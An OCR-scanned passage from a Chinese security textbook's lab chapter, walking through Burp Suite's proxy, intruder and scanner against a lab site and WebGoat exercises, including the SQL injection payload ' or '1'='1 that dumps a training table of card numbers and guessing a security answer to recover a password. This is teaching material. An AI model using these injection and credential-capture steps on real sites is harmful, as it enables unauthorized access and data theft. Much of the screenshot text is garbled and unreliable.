behaviour of tools throughout the suite. All fields take regex strings. The easiest way to 
configure scope is to browse to your target and use the context menus in the site map 
to include or exclude URL paths. 


include in scope R 


3 about:blank 一 Mi 


6-7 设置 scope 选项 卡 


E. burp suite professional vl.4.07 — licensed to DrakonHaSh 
burp intruder repeater window about 


tae MU ior | scanner [nior | repeater | sequencer | decoder | comparer | optons | as 

(Ste map 

= Menon Sobang org EHE a 
- 


o- http-//www.2345.com 
o- http.//Www.aSpsky net hüp//www.sqLc.|GET ldefaultasp  — | (Jj | — | | 
hüp/wwwsqic.|GET  |defautasp?dassid-i | 回 | | | 


| > http.//www.google.com 


> liti htpiwwwsqic.|GET J/default asp?ciassid-2 LAE E 
-— hipiwwwsqic.|GET lindexasp ë ë  — (| J|  1- 
addam is Scope hüp/wwwsqic.|GET  |indexasp?dassió-i&Ndassid-i | i] | | | 
üpiwwwsqLc.|GET listasp LE au 
X hüpiwwwsqic-|GET  Jistaspud-ci | 加 | T 
actively scan this host hjwwwsqic-|GET |Wstaspóo-2 | 四 | T 
hüp/Wwwsqic-|GET jjSWie css La E 
passively scan this host 
uem headers | hex | 
pand branch GET / HTTP/1.0 
expand requested items Accept: image/gif, image/x-xbitmap, image/jpeg, 
host image/pjpeg, application/x-shockwvave-flash, 
delete application/vnd.ms-excel, 
copy URLs in this host application/vnd.ms-powverpoint, application/msword, */* 
Accept-Language: zh-cn 
copy links in this host ossa tua i011118/4.0 (compatible; MSIE 6.0; 
save selected items Windows NT 5.1; SV1) 
Host: vvv.sql.com 
Proxy-Connection: Keep-Alive 
J LT € 3 about:blank - Mi 


6-8 ”使 用 spider KERA 7145 S 
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t burp suite professional v1.4. 0T — licensed to DrakonHaSh 
burp intruder repeater window about 


^ target a :pider scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 
cona | options 
四 spider running 


To begin spidering, browse to the target application, then select one or more nodes in 
the target site map, and choose "spider from here". 


requests made: 42 | 
bytes transferred: 133,713 
requests queued: 0 


men 


sptder scope 


@ use suite scope [defined in target tab] 加 | 


©) use custom scope 


4$, burp suite profe 3 about:blank - Mi 


图 6-9 爬虫 仆 取 网 页 时 显示 的 信息 
4 Active scanning wizard 


Actively scan multiple items 

You have selected 18 items for active scanning. Before continuing, you can use the filters below to 
remove certain categories of items, to make your scanning more targeted and efficient 

remove duplicate items (same URL and parameters) [5 items) 

图 remove items already scanned (same URL and parameters) [0 items] 

[.] remove out-of-scope items [0 items] 


remove items with media responses [1 item] 


[ ] remove items with the following extensions [0 items] 


lis. git.pg.png.css 


6-10 选中 或 取消 选中 相关 的 项 目 


步骤 11: 单 击 next 按钮 ,出现 如 图 6-11 所 示 的 对 话 框 ,显示 已 经 获取 的 信息 。 

步骤 12; 接着 单 击 ok 按钮 ,系统 会 提示 针对 该 网 站 有 些 扫 描 超 出 了 范围 ,是 否 需 要 继 
续 进 行 , 单 击 Yes 按钮 即 可 。 之 后 ,所 有 有 关 该 网 站 (本 实验 为 www. sql. com) 的 信息 都 会 
显示 ,如 图 6-12 所 示 。 

步骤 13 : 扫描 结束 后 ,需要 对 漏洞 进行 详细 的 分 析 。 可 以 选取 相应 的 漏洞 名 称 ,然后 在 
右 下 角 的 advisory( 公 告 ) 栏 中 显示 有 关 该 漏洞 的 详细 信息 ,具体 包括 相应 的 问题 名 称 、 严 重 
程度 、 确 信 程度 、 路 径 地 址 等 ,如 图 6-13 所 示 。 
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t Active scanning wizard 


Confirm items to scan 


Review the items you have selected for scanning. Double-click items to view full details. You can remove individual items which 
you do not wish to scan, or go back to modify your general filters. 


host method params| cookies| status | length | MIME type 
hüp/www.sqicom |GET 0 0 200  |3713 HTML 
GET JIpo Il0 | (200 [2450 HTML | 


hüpJwwwsq.com |GET 5 = 
asp | 


ndex asp?dassid-1&Ncdlassid- 1 
ndex asp?dassid-&Ndassid- 


611 显示 已 经 获取 的 信息 


$ burp suite professional v1.4.07 - licensed to DrakonHaSh 
burp intruder repeater window about 

target spider | scanner | intruder | repeater | sequencer | decoder | comparer | optons | alens 
resuts 


~ i http//www.2345.com ) HTTP PUT enabled 


TP PUT 
~ Q) htwww sal com, 
Ee 


Cookie without HttpOnly flag set 
€- 1 Cross-domain Referer leakage [2] 
i Email addresses disclosed 
N i HTML does not specify charset 
i Directory listing 
i Contenttype incorrectly stated 
ò- į HTML uses unrecognised charset [4] 


request 


Q HTTP PUT enabled 


Issue: HTTP PUT enabled 
Severity. High 

Confidence: Certain 

Host http//www.sql.com 
Path: ipic! 


Issue detail 


3 about: blank ~ Mi 


6-12 REŽ www. sql. com 网 站 的 详细 信息 


步骤 14: 访问 后 台地 址 www. sql. com/admin. asp, 本 实验 中 使 用 的 “用 户 名 称 ” 和 “用 
户 密码 ”都 是 admin ,如 图 6-14 所 示 。 

步骤 15: 正确 输入 用 户 名 称 和 用 户 密码 后 ,进入 管理 界面 ,如 图 6-15 所 示 。 

步骤 16. 这 时 ,在 Burp Suite 的 proxy history 选项 卡 中 ,可 以 看 到 刚才 提交 验证 的 页 
面 登 录 认证 信息 ,其 中 method 是 以 post 方式 提交 的 ,网 址 是 www. sql. com/Chkadmin. 
asp。 选 取 该 网 址 后 右 击 ,在 出 现 的 快捷 菜单 中 选择 send to intruder 选项 ,如 图 6-16 所 示 。 
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4 burp suite professional v1.4.07 - licensed to DrakonHaSh 
burp intruder repeater window about 
^ target | ' spider | scanner | intruder | repeater sequencer | decoder | comparer options | alerts 


resuls | scan queue | ive scanning | options | 


e- 1 httpilwww.2345.com |) HTTP PUT enabled 
-Q Cookie without HttpOnly flag set 
ọ- į Cross-domain Referer leakage [2] 
i Email addresses disclosed 
i HTML does not specify charset 
j Directory listing 
į Contenttype incorrectly stated 


œ i HTML uses unrecognised charset [4] 


E requesi2 | response? 


HTTP PUT is enabled on the web server. The file /cd4ca10bíf10c972 bt was 
uploaded to the server using the PUT verb, and the contents of the file were 
Subsequently retrieved using the GET verb. 


n ITAN. € 4 burp suite profe B about:blank - Mi [一 
6-313 扫描 结束 后 显示 的 完整 信息 


A 管理 者 登陆 - crosoft Internet Explorer 


LFF $8800 EE 收藏 WA) IAM 帮助 00 


Q=: - O- iid G Pss y-9g90- $8.98 


地 址 0) & http://www. sql. con/adnin. asp 


Google:-/10 Alexa:- 


Ww burp suite profe 


图 6-14 网 站 后 台 的 登录 界面 
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d 管理 考区 - Nicrosoft Internet Explorer 


文件 人 F) $380) $590) BEA IAM 帮助 0 


Qa- O- inid6 Ds v; O 2-3 9 8 


HitF O) (48) http://www. sql. con/nanage. asp 


动 网 文章 管理 系统 管理 页 面 


管理 员 可 进行 损 作 说 明 ; 
1 , 通过 Yeb 添 加 文章 ,请 选择 添加 软件 。 斤 作用 户 : 所 有 用 户 

3， 对 已 经 添加 文章 修改 或 山 除 ， 请 点 左边 相关 连接 进行 换 作 。 换 作用 户 : BAP, NESPA 
4 ,对 栏目 进行 添加 修改 删除 ， 请 点 左边 相关 演 搬 直行 操作 。 所 作用 户 : 超级 用 户 

s, 用 户 的 增加 修改 删除 ,请 点 左边 相关 连接 进行 操作 。 控 作用 户 : 超 领 用户 

8， 为 了 系统 的 安全 性 , 离开 管理 请 点 击 退出 系统 

9, 有 何 建 议 请 到 我 们 的 论坛 提出 wrw. dvbbs. net 


动 网 先 棒 版 权 所 有 , Copyright € 2000-2004 aspsky.net, All Rights Reserved 


Google:-/10  Alexa:22905698 


e 管理 考区 Mi cro 


Filter: hiding CSS, image and general binary content 


| £| — hot —  j|mehod — URL —|params| mod | status | Pei D 
G6 |hipiwewgoogiecom |GET — |weardr?dient-navientauo&Kezures-Rankügin-| E] | L] | | | | 
97 |htpJwwwgoogliecom |GET — |isearch?cientenavdi ——-22—— —9—5——3—59— 1E] T — 1 — ] — 


ad emoten toms O 1—1— 


. 
E 


THE 
iii 
| 
| 
| 


| 
| 


T 
| 
T 


8 
$ 
in 


EEE 
1 
i 

i 


E 


perenes” 


| 


站 
E NGI 


"ig 


http. //www.google.com 


POST /Chkadmin.asp HTTP/1.0 
Accept: image/gif, image/x-xbitmap, image/ on/x-shockvave-flash, 
application/vnd.ms-excel, application/vnd.m svord, */* 


Referer: http://wvw.sql.com/admin.asp 
Accept-Language: zh-cn 


6-16 选择 send to intruder 选项 
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步骤 17: 程序 会 自动 跳 转 到 intruder 选项 卡 ,选择 下 方 的 positions 选项 卡 后 ,将 会 看 
到 刚才 提交 的 请 求 信息 ,如 图 6-17 所 示 。 读 者 会 发 现 , 网 站 后 台 登 录 时 使 用 的 “用 户 名 称 ” 
和 “用 户 密 码 ” 等 信息 都 直接 显示 在 其 中 ,用 户 名 称 和 密码 都 是 admin, 


burp suite professional vl1.4.07 — licensed to DrakonHaSh 


人 


1/2 


target | positions payloads | options | 


atacktpe [sniper | 

0 payload positions length: 577 

POST /Chkadmin.asp HTTP/1.0 ^ add$ 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockvave-flash, application/vnd.ms-excel, 

application/vnd.ms-poverpoint, application/msvord, */* dear $ 
Referer: http://wwv.sql.com/admin.asp 


Accept-Language: zh-cn 
Content-Type: application/x-wvw-form-urlencoded 


Proxy-Connection: Keep-Alive 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Vindovs NT 5.1; SV1) 
Host: vvv.sql.com 

Content-Length: 49 

Pragma: no-cache 

Cookie: ASPSESSIONIDCCSCSSRC*NABDHRHJDLDABGNGMHEAFOICL 


| Ueeename adnintP ers word-adnines uni sco, B7*CO*CF| I 


图 6-17 显示 网 站 后 台 登 录 的 用 户 名 称 和 密码 等 信息 


步骤 18: Æ target site map 选项 卡 中 ,选择 网 站 名 称 后 右 击 , 在 出 现 的 快捷 染 单 中 选择 
engagement tools-*find scripts 选项 ,可 以 扫 摘 并 显示 网 站 的 所 有 脚本 页 面 , 如 图 6-18 所 示 。 


4 burp suite professional vl1.4.07 — licensed to DrakonHaSh 
burp intruder repeater window about 


Filter: hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders 


~ http-//go microsoft.com 
o- http .//union2 50bang.org 


Ds htp-/ww 2345. com 人 wwwaqic E E ET 200 ”Roni 
L uicsuwen sepa hüp/wwwsq.c.|GET  |defautasp?dassid-i | || (200 [374 
e htp www google com hüp/wwwsq.c.|GET  |defautasp?dassid-2 | || (200 (33: 
gei hüp/wwwsqic.|GET lindexasp —— | Lj po ja 
— mapywwwsqic -|GET | 
T POST nderasp^csss-RNdassi- | qj [09 — ei 
hüp/wwwsq.c.|GET  Jindexasp?dassió-i | i| 200 py 


hitp//www.sqlc.|GET /indexasp?cassid-1&Nclassid- | [v] |200 |49 
hitp//www.sqlc.|GET |/indexasp?cassid-1&Nclassid-1 | [v] |200 |49: 
p -—— | 


actively scan this host 


passively scan this host 


compare site maps 
expand branch 

expand requested items 
delete host 
copy URLs in this host 
copy links in this host 


image/gif, image/x-xbitimap, image/jpeg, 
jpeg, application/x-shockwave-flash, 
ion/vnd.ms-excel, 
ion/vnd.ms-powerpoint, application/msword, */* 
anguage: zh-cn 

ent: Mozilla/4.0 (compatible; MSIE 65.0; 


F 管理 者 登陆 - Mic 


6-18 扫描 并 显示 网 站 的 所 有 脚本 页 面 
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步骤 19; 单 击 search 按钮 就 可 以 将 当前 网 站 的 脚本 页 面 全 部 列 出 来 ,如 图 6-19 所 示 。 
操作 者 可 根据 显示 的 内 容 , 对 网 站 进行 系统 的 分 析 。 


4 scripts search | http://www. sql. com/ 


L] dmamicuptale 


sowe | ros URL m T 
区 
和 
Scanner |hüpiMwwwsqlcom Jinderasp?dassid-&Ndassid- jjavascript'submit(), var onecount onecou- 143112123. 
target  |Mip/wwwsdicom Jindexasp?dassid-&Ndassid-  javascriptsubmil() var onecount onecou.. 14:28:14 12 | 
target  |Müp/wwwsdicom indexasp?dassid-i —— javascriptsubmili), var onecount onecou... 14281112. 
bé |ip ww sl om — fingex asp ?das sig aNd — javescigteubmi0 var onecount onecou-- 11426-14 TIR. 
hüpiMwwwsqicom Andexasp?dassid-i&Ndassid-i javascriptsubmit(). var onecount onecou.. 1428-11 125. 
hiüp/Wwww.su.com lindexasp?dassid2  Varonecount onecount-0; subcal - new .. 1428.11 12... | 
pd bewwsyco boa —  — -  jaeotüsonbel] — E 
large  |hüpiwwwsqicom |Rvqueyasp Naronecount onecount-0 subcal - new — 1428-11 12. 


scripts | response | request 


图 6-19 ” 列 出 网 站 的 全 部 脚本 页 面 信息 


步骤 20: repeater 功能 用 于 在 不 同 的 情况 下 修改 和 发 送 相 同 的 请 求 , 并 对 返回 信息 进 
行 分 析 , 如 图 6-20 所 示 。 


4 burp suite professional v1.4. 07 licensed to DrakonHaSh 


burp intruder repester window about 


spider | scanner | iruder | repeater | sequencer | decoder | comparer | options | aient 


Lo] m E em 


request 


GET / HTTP/1.0 


HTTP/1.1 200 OK| 
Connection: close 


Date: Sun, 12 May 2013 06:40:50 GMT 

Server: Microsoft-IIS/6.0 

MicrosoftOfficeWebServer: 5.0 Pub 

Content-Length: 3438 

Content-Type: text/html 

Set-Cookie: ASPSESSIONIDCCSCSSRC*OABDHHJDGFCAGIICCFHEDKJE; path=/ 


f JL» , i s 
` TZA € V burp suite profe PES /we SQL 上 C 14:40 


图 6-20 根据 不 同 的 情况 修改 和 发 送 相同 的 请 求 并 进行 分 析 
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步骤 21: sequencer 功能 主要 用 来 检查 Web 应 用 程序 提供 的 会 话 令 牌 (该 令 牌 的 产生 
是 随机 的 ) ,并 执行 各 种 测试 ,如 图 6-21 所 示 。 


£ burp suite professional v1.4. 07 — licensed to DrakonHaSh 


burp intruder repeater window about 


“ target (m) spider | scanner | intruder | repeater Í sequencer | decoder 1 comparer | options | alerts | 


live capture | manual load 


select request 
^| | remove 
send ghz here from other tools to configure a live capture 
identify token in response 


‘token location | capture options 


(&) custom location | configure | 
- 77:47. ,€ 4 burp suite profe BE. '/www. sql. c Em 14:40 


6-21 检查 Web 应 用 程序 提供 的 会 话 令 牌 的 随机 性 


步骤 22. decoder 功能 可 用 于 解码 数据 ,还 原 数 据 原来 的 形式 或 进行 编码 和 加 密 数 据 ， 
操作 界面 如 图 6-22 所 示 。 


4 burp suite professional vl1.4.07 — licensed to DrakonHaSh 


burp intruder repeater window about 


"spider | scanner | intruder | repeater | sequencer | decoder Í comparer | options | alerts | 


^ target 


6-22 解码 数据 找 回 原来 的 数据 形式 
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步骤 23: comparer 功能 用 来 执行 任意 的 两 个 请 求 、 啊 应 或 任何 其 他 形式 的 数据 之 间 的 
比较 ,如 图 6-23 所 示 。 


suite professional v1.4.07 — li 


burp intruder repeater window about 


load, paste, or send data here from other tools to perform a compare 


FTT L 
, L5» pe | . 
8 JII E "b burp suite profe e http / www. sql. c E 14:41 


6-23 ”执行 任意 的 两 个 请 求 


对 于 其 他 的 一 些 功能 ,读者 可 以 继续 查阅 相关 资料 进行 学 习 ,并 通过 相关 实验 等 握 其 应 
用 方法 。 


6.1.4 任务 与 思考 


Burp Suite 是 一 个 功能 蝇 大 的 漏洞 扫 摘 、 检 测 和 分 析 工 具 集 ,本 实验 仅 涉 及 该 工具 集中 
的 部 分 工具 应 用 ,建议 读者 在 本 实验 的 基础 上 ,通过 查阅 Burp Suite 技术 文档 ,进一步 掌握 
相关 工具 的 使 用 方法 。 同 时 ,为 便于 读者 加 强 对 漏洞 扫描 和 利用 的 学 习 ,建议 进 一 步 学 习 以 
下 内 容 。 

1. SQL 注入 

SQL 语言 是 一 种 数据 库 查询 语言 ,SQL 注入 攻击 则 是 后 台数 据 库 引擎 将 用 户 输入 的 恶 
意 语句 当 作 代码 执行 ,导致 数据 库 被 入 侵 。 利 用 SQL 注入 技术 来 实施 网 络 攻击 常 称 为 
SQL 注入 攻击 ,SQL 注入 攻击 的 本 质 是 利用 Web 应 用 程序 中 所 输入 的 SQL 语句 的 语法 处 
理 , 针 对 Web 应 用 程序 开发 者 编程 过 程 中 未 对 SQL 语句 传人 的 参数 做 出 严格 的 检查 和 处 
理 所 造 成 的 。 习 惯 上 将 存在 SQL 注入 点 的 程序 或 网 站 称 为 SQL 注入 漏洞 。 

实际 上 ,SQL 注入 是 存在 于 有 数据 库 连 接 的 应 用 程序 中 的 一 种 安全 漏洞 。 在 具体 的 攻 
击 过 程 中 ,攻击 者 一 般 通 过 在 应 用 程序 中 预先 定义 好 的 查询 语句 结尾 加 上 额外 的 SQL 语句 
元 素 ,欺骗 数据 库 服 务 器 执行 非 授 权 的 查询 。 这 类 应 用 程序 一 般 是 基于 Web 的 应 用 程序 ， 
它 允 许 用 户 输入 查询 条 件 , 并 将 查询 条 件 胡 入 SQL 请 求 语句 中 ,发 送 到 与 该 应 用 程序 相关 
联 的 数据 库 服 务 需 中 去 执行 。 通 过 构造 一 些 畸 形 的 输入 ,攻击 者 能 够 操作 这 种 请 求 语句 去 
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获取 预先 未 知 的 结果 。 

读者 可 以 利用 Burp Suite 功能 对 某 一 网 站 用 户 登 录 的 任意 信息 进行 抓 包 ,然后 分 析 数 
据 包 。 

2. 跨 站 脚本 攻击 

当 一 个 Web 服务 器 接收 来 自用 户 恶 意 构 造 的 数据 时 ,被 接收 恶意 的 数据 通常 以 超 链接 
HEREA Web 服务 器 ,该 超 链接 包含 了 恶意 的 内 容 , 如 果 用 户 不 注意 单 击 了 这 些 链接 , 跨 
站 脚本 就 可 能 发 生 。 

恶意 链接 的 来 源 有 可 能 来 自 另 一 个 网 站 的 链接 ,也 有 可 能 来 自 怀 有 恶意 的 邮件 ,或 者 是 

某 些 即时 通信 软件 上 的 消息 链接 等 通常 情况 下 ,攻击 者 会 把 链接 到 恶意 站 点 的 超 链 接 中 
的 部 分 内 容 用 二 进 制 或 其 他 编码 方法 进行 编码 ,所 以 当 用 户 单 击 时 不 会 产生 怀疑 。 当 某 些 
敏感 数据 被 网 页 服务 接收 后 , 它 会 向 用 户 产生 一 个 包含 恶意 数据 的 页 面 输出 ,而 这 些 数据 正 
是 攻击 者 之 前 艇 入 网 页 的 。 

跨 站 脚本 是 指 在 远程 Web 页 面 的 HTML 代码 中 插入 的 具有 恶意 目的 的 数据 ,用 户 认 
为 该 页 面 是 可 信赖 的 ,但 是 当 用 户 下 载 该 页 面 时 ,组 入 其 中 的 脚本 将 被 解释 执行 。 所 以 ,器 
站 脚本 产生 的 根本 原因 就 在 于 数据 和 代码 的 混合 使 用 。 

3. 文件 上 传 

文件 上 传 是 指 用 户 上 传 了 一 个 可 被 Web 容器 解释 执行 的 脚本 文件 , 即 通 过 执行 此 脚本 
可 获得 服务 器 端 权 限 。 某 些 环 境 下 ,这 种 攻击 方式 技术 要 求 不 高 ,相对 其 他 类 型 的 漏洞 更 加 
直接 、 有 效 ,但 是 威胁 程度 考 良 置疑。 

4. 目录 遍历 

目录 遍历 又 称 为 路 径 遍 历 ,可 以 获取 系统 文件 和 服务 器 的 配置 文件 ,甚至 在 Web 根 目 
录 以 外 执行 系统 命令 。 导 致 目录 遍历 的 原因 是 Web 服务 器 对 用 户 输 入 的 字符 过 滤 不 严格 ， 
攻击 者 可 以 通过 HTTP 请 求 输入 一 些 特殊 字符 ,从 而 绕 过 服务 器 的 安全 限制 。 严 格 来 说 ， 
目录 遍历 也 是 设计 人 员 设 计 中 的 “漏洞 ?。 


6.2 Web 安全 漏洞 学 习 平 台 : WebGoat 的 使 用 


6.2.1 预备 知识 : WebGoat 介绍 


WebGoat 是 一 个 用 来 演示 Web 浏览 硕 中 典型 安全 漏洞 的 应 用 程序 ,其 目的 是 在 应 用 
程序 安全 审查 的 上 下 文中 系统 、 完 整地 介绍 如 何 测试 和 利用 这 些 安 全 漏洞 。 

WebGoat 用 Java 语言 编写 ,可 以 安装 到 所 有 融 有 Java 虚拟 机 环境 的 平台 上 。 此 外 ， 
WebGoat 还 分 别 为 Linux, OS X Tiger 和 Windows 系统 提供 了 相应 的 安装 程序 。 无 论 运 
行 在 什么 操作 系统 平台 上 ,WegGoat 都 会 日 动 跟 中 用 户 的 操作 过 程 ,记录 在 平台 上 的 学 习 
进展 。WegGoat 当前 提供 的 训练 课程 有 30 多 个 ,其 中 包括 跨 站 点 脚本 攻击 (XSS) ,访问 控 
制 .线程 安全 .操作 隐藏 字段 、 操 纵 参 数 、 罚 会 话 Cookie, SQL 盲 注 、 数 字 型 SQL 注入 .字符 
串 型 SQL 注入 .Web 服务 .OpenAuthen-tication、 危 险 的 HTML 注释 等 内 容 。 

虽然 WebGoat 中 对 于 如 何 利 用 漏洞 给 出 了 大 量 的 解释 ,但 还 是 比较 有 限 的 。 不 过 ,对 
于 初学 者 来 说 , WegGoat 是 一 个 功能 丰富 、 便 于 使 用 的 学 习 平 台 。 它 的 每 个 教程 都 明确 告 
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诉 读者 存在 什么 漏洞 ,但 是 如 何 去 攻 破 这 些 漏洞 ,还 需要 读者 继续 查阅 相关 资料 ,通过 进 一 
步 学 习 来 了 解 该 漏洞 的 原理 .特征 和 攻击 方法 ,甚至 需要 读者 搜集 相关 的 辅助 攻击 工具 , 完 
成 各 种 攻击 过 程 。 


6.2.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 的 学 习 , 能 够 使 读者 掌握 基于 应 用 层 的 弱点 测试 手段 与 方法 ,这些 方法 对 于 
网 络 攻 防 与 防御 是 非常 有 用 的 。 

2. 实验 条 件 

本 实验 不 需要 构建 专门 的 实验 环境 ,只 需 一 台 接 人 互联 网 的 主机 即 可 。 通 过 该 主机 , 利 
用 WebGoat 工具 进行 学 习 。 


6.2.3 实验 过 程 


步骤 1: 正常 登录 实验 用 计算 机 ,在 进行 实验 之 前 确保 该 计算 机 能 够 正常 访问 互联 网 。 
然后 安装 WebGoat 软件 。 安 装 过 程 中 ,首先 需要 部 署 一 个 Java 环境 ,再 安装 WegGoat 的 
软件 包 。 

步骤 2: 打开 Internet Explorer 1l Vi 25 . TE Ho Bi E P $i A " http://localhost/WebGoat/ 
attack”, 在 打开 的 页 面 中 输入 用 户 名 称 和 口令 。 首 次 使 用 时 ,还 需要 进行 在 线 注册 。 

步骤 3: 单 击 Start WebGoat 按钮 ,如 图 6-24 所 示 ,进入 WebGoat 操作 界面 。 


忆 WebGoat V5.2 — Nicrosoft Internet Explorer 
TFE AWE EFV WEG) IA) 帮助 册 
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exercises are intended to provide hands on experience with application penetration testing techniques. 


The WebGoat project is lead by Bruce Mayhew. Please send all comments to Bruce at 
WebGoat@owasp.org. 


Thanks to (0 OUNCE LABS for supporting Bruce on the WebGoat Project. 
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Special Thanks for V5.2 Documentation Contributers 
to Lippuner Sherif Koussa 
Marcel Wirth Aung Khant 
(http-//yehg.org/) 
Erwin Geirnaert 
To all who have sent comments (http://www.zionsecurity.com/) 


Sun WebGoat | 
A v 


^ 
E 
Sd 


6-24 ik Start WebGoat 按钮 


步骤 4: 首先 进行 字符 串 型 SQL 注入 实验 。 在 左 侧 列表 中 选择 String SQL Injection 
选项 ,如 图 6-25 所 示 ,在 其 上 单 击 进 入 该 页 面 。 


第 6 章 Web 浏 览 器 攻防 实 训 221 


3 How to work with WebGoat 一 Nicrosoft Internet Explorer 


XO) RO) EO) 收藏 人 IAT) 858500 a 
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Access Control Flaws 


How To Work With WebGoat 


AJAX Security 

gr niti dia Welcome to a short introduction to WebGoat. 

Code Quality Here you will learn how to use WebGoat and additional tools for the lessons. - 
Concurrency 

Cross-Site Scripting (XSS) Environment Information 


Denial of Service 
Improper Error Handling 


Injection Flaws WebGoat uses the Apache Tomcat server. It is configured to run on localhost although this 


can be easily changed. This configuration is for single user, additional users can be added in 
Command Injection the tomcat-users.xml file. If you want to use WebGoat in a laboratory or in class you might 
Blind SQL Injection — change this setup. Please refer to the Tomcat Configuration in the Introduction 
Numeric SQL Injection 
Log Spoofing The WebGoat Interface 
XPATH Injection 
LAB: SQL Injection 
Stage 1 String SQL Injection 
Stage 2: Parameterized 


Query #1 
Stage 3: Numeric SQL 
injection 
Stage 4: Parameterized ni 
piden a. Ü 4 Restart this Lesson 
MUSAE, d mus luis Enter your name in the input field below and press "go" to submit. The server will accept the 
Database Backdoor MIT? toits ———————————— 
Insecure Communication Musee, The user should become famibar weh the features of WebGoat by marsoulabng the above v 
Insecure Confinuratian ALehenhcahon Frat he Hense hn vitm hive and enhdine Yau haue tn ote Weherarah far tha bret hme - 
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6-25 选择 String SQL Injection 选项 


步骤 5: 进入 如 图 6-26 所 示 的 操作 窗口 ,在 用 户 提交 信息 的 窗口 中 可 以 看 到 提示 的 
SQL 语言 : SELECT * FROM user data WHERE last name = ' Your Name ' ,该 测试 项 
JJ String SQL Injection ,对 于 SQL 语句 中 的 “' ”字符 , 它 作 为 查询 参数 的 左 闭 合 符 号 ,可 以 
在 Your Name 中 输入 “ ”使 其 闭合 。 


动 String SQL Injection 一 Microsoft Internet Explorer 
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Introduction 


Solution Videos Restart this Lessc 
General 
Access Control Flaws JSESSIONID > BD095ADG6ADF86DD34C668A80AFGE1DCE 
AJAX Security 
Authentication Flaws SQL injection attacks represent a serious threat to any database-driven site. The methods 
Buffer Overflows behind an attack are easy to learn and the damage caused can range from considerable to 
Code Quality complete system compromise. Despite these risks, an incredible number of systems on the 
Concurrency internet are susceptible to this form of attack. 


Cross-Site Scripting (XSS) 
Denial of Service 
Improper Error Handling 
Injection Flaws 


Not only is it a threat easily instigated, it is also a threat that, with a little common-sense anc 
forethought, can easily be prevented. 


It is always good practice to sanitize all input data, especially data that will used in OS 
Command Injection command, scripts, and database queiries, even if the threat of SQL injection has been 


Blind SQL Injecti prevented in some other manner. 


ric ec General Goal(s): J 
Los Spoofing 
XPATH Injection The form below allows a user to view their credit card numbers. Try to inject an SQL string 
LAB: SQL Injection that results in all the credit card numbers being displayed. Try the user name of 'Smith'. 


Stage 1: String SQL Injection I 
Stage 2: Parameterized Enter your last name: | or = 1 zi 


Quer y 21 


Stage 3: Numeric SQL 
Injection SELECT + FROM user data WHERE last name = 'Your Name' 


Stage 4: Parameterized 
Query +2 No results matched. Try Again. 


String SQL Injection 
Database Backdoors Rd 


[s] 
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图 6-26 “用户 提交 信息 窗口 
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读者 可 以 输入 "or '1 = '1, 这 样 ,原来 SQL 语句 中 的 “*'” 就 作为 “'1” 的 右 闭 合 符号 , 单 
ii Go! 按钮 。 

步骤 6: 然后 看 到 读者 此 次 输入 所 产生 的 SQL 查询 命令 ,这 样 就 得 到 了 所 有 的 用 户 列 
表 。 该 攻击 完成 , 左 侧 的 String SQL Injection 前 出 现 了 绿色 的 “/”, 如 图 6-27 所 示 。 


J String SQL Injection 一 Microsoft Internet Explorer 
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. Congratulations. You have successfully completed this lesson. 


we | 
cL — " * Bet you can't do it again! This lesson has detected your successfull attack and m 
Stage 3: Numeric SQL has now switched to a defensive mode. Try again to attack a parameterized 


Stage 4: Parameterized 
Query #2 


$... — Enter your last name: i or 171 I N 


Database Backdoors 


SELECT + FROM user data WHERE last name = '' or '1'-z'1' 
USERID |FIRST NAME LAST NAME |CC NUMBER  |CC TYPE COOKIE LOGIN COUNT 
101 Joe Snow 987654321 VISA 0 
101 Joe [Snow [2234200065411 [MC [o 
[102 John [Smith [2435600002222 |MC lo 
102 [John [Smith [4352209902222 [AMEX | p 
103 Jane Plane 123456789 MC 
103 Jane Plane 333498703333 [AMEX 
10312 [Jolly Hershey 176896789 MC 3 
10312 [Jolly Hershey [333300003333 [AMEX o 
10323 [Grumpy [White [673834489 [MC lo 
10323 [Grumpy [White [33413003333 [AMEX lo 
15603 [Peter Sand 123609789 MC 0 
15603 [Peter [Sand [338893453333 [AMEX [o E 
15613 [Joesph [Something [33843453533 [AMEX [o 
Y 
< j de 
PEN pen | &J 本 地 Intranet 
7 JL7/- - 3) 
H 


图 6-27 显示 得 到 的 所 有 用 户 列表 


下 面 请 读者 进行 Forgot Password 项 的 攻击 学 习 。 

步骤 7: 在 左 侧 列表 中 找到 Forgot Password 选项 ,如 图 6-28 所 示 ,在 其 上 单 击 进入 该 
页 面 。 

步骤 8: 通常 情况 下 程序 员 都 会 采用 有 意义 的 名 称 作 为 表 名 和 字段 名 。 例 如 ,管理 员 表 
为 admin ,新 闻 表 为 news. M ri 18 7J guestbook 或 guest ,文章 系统 表 为 article, 等 等 。 因 此 ， 
在 这 里 可 以 利用 一 些 经 验 和 可 能 的 猜测 回答 来 破解 系统 ,从 而 获取 用 户 密 码 。 在 User 
Name 后 面 的 文本 框 中 读者 可 以 尝试 输入 一 个 用 户 名 ,如 输入 “admin”, 然 后 单 击 Submit 按 
钮 ,如 图 6-29 Brzn . 

步骤 9: 在 出 现 的 如 图 6-30 所 示 的 窗口 中 ,说 明 用 户 名 admin 已 经 存在 ,现在 要 求 回答 
认证 问题 。 根 据 提 示 ,尝试 获取 用 户 admin 对 应 的 密码 ,首先 尝试 输入 “yellow”, 发 现 并 没 
有 通过 ; 青 尝试 输入 “green”, 发 现 通过 ,得 到 了 admin 账户 的 密码 为 2275 $ starBoOrn3 ,如 
图 6-31 所 示 。 


6.2.4 任务 与 思考 


随 看 网 络 安全 威胁 越 来 越 引 起 社会 各 界 的 普遍 重视 ,一 些 安 全 机 构 开 发 了 一 些 非常 优 
秀 的 在 线 开放 实验 实 训 平台 ,利用 这 些 平台 ,可 以 较为 系统 ,全面 地 学 习 有 关 的 安全 知识 。 
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Multi Level Login 1 Not only is it a threat easily instigated, it is also a threat that, with a littie common-sense and 
-—— forethought, can easily be prevented. 
Buffer Overflows It is always good practice to sanitize all input data, especially data that will used in OS 
Code Quality command, scripts, and database queiries, even if the threat of SQL injection has been 
Concurrency prevented in some other manner. 
Cross-Site Scripting (XSS) 
Denial of Service General Goal(s): 


Improper Error Handling 


no The form below allows a user to view their credit card numbers. Try to inject an SQL string 
that results in all the credit card numbers being displayed. Try the user name of 'Smith'. v 
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6-28 选择 Forgot Password 选项 


